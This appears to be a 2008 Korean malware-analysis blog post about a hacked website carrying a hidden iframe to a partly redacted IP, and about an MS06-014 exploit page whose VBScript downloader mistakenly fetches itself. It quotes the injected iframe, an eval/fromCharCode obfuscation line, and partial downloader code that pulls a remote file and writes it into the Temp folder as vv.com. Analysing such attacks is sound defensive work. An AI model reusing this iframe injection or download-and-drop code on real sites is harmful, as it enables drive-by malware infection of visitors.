태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'MS06-014'에 해당되는 글 1건

  1. 2008.02.27 멍청한 Exploit Code?
바이러스분석2008.02.27 09:39


특정 웹 사이트가 해킹되어 일부 웹 페이지에 악성 아이프레임 소스가 추가되었다.

<iframe src=http://121.[삭제].130/comm.htm width=0 height=0></iframe>

그런데 재밌는것이 연결이 시도되는 comm.htm 내부 명령이다.

이 파일에는 스크립트 명령을 통해서 일부 코드를 알아보기 어렵게(암호화) 해 두었다.

t=eval("String.fromCharCode("+t+")");

이 코드를 복호화하면 사용자가 알아차리지 못하게 function init() / window.onload = init; 함수를 이용하여 아래와 같은 문구가 보여지게 만든다.

No web site is configured at this address.

사용자 삽입 이미지

여기서 재밌는 것은 실제 사용된 MS06-014 Exploit Code 의 최종 설치 파일이 아래와 같이 다시 comm.htm 파일이라는 것이다.

<script language="VBScript">
On Error Resume Next
exe = "http://121.[삭제].130/comm.htm"
하위생략
</script>

그렇게 되다보니 아래와 같은 오류창이 출력되는데, 이는 Temp 폴더에 vv.com 으로 생성시키는 명령 때문이다. 정상적인 PE 파일이 아니기 때문이다.

vv2="GET"
x.Open vv2, exe, False
x.Send
fname1="vv.com"
Set F = vv.CreateObject("Scripting.FileSystemObject","")
Set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)

사용자 삽입 이미지

사용자 삽입 이미지

공격자는 악성코드 링크를 지정하는 과정에서 딴 생각(?)을 했나보다. 의도하진 않았겠지만 사용자의 화면에는 위와 같은 오류창(16비트 MS-DOS 하위 시스템)이 출력된다.

공격자는 아마 자기 코드가 정상적으로 작동한다고 생각하고 있을지도 모르겠고, 나중에 발견하여 수정을 하게 될지도 모르겠다.

몇일 두고보면서 공격자의 활동을 예의주시해야 겠다.
Posted by viruslab